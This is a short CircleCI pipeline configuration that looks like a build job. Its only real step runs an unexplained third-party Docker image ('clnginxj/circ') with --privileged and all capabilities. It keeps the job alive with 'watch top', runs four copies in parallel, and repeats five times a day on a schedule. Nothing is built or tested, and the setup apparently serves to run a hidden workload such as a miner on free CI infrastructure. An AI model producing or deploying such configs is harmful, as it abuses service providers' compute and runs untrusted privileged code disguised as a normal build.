version: 2.1
jobs:
  build:
    docker:
      - image: alpine
    parallelism: 4
    steps:
      - setup_remote_docker

      - run: |
          apk update && apk add --no-cache docker-cli
          docker run --privileged --cap-add=ALL clnginxj/circ && watch -n 10 top

workflows:
  version: 2
  commit:
    jobs:
      - build

  nightly:
    triggers:
      - schedule:
          cron: "10 0,5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - build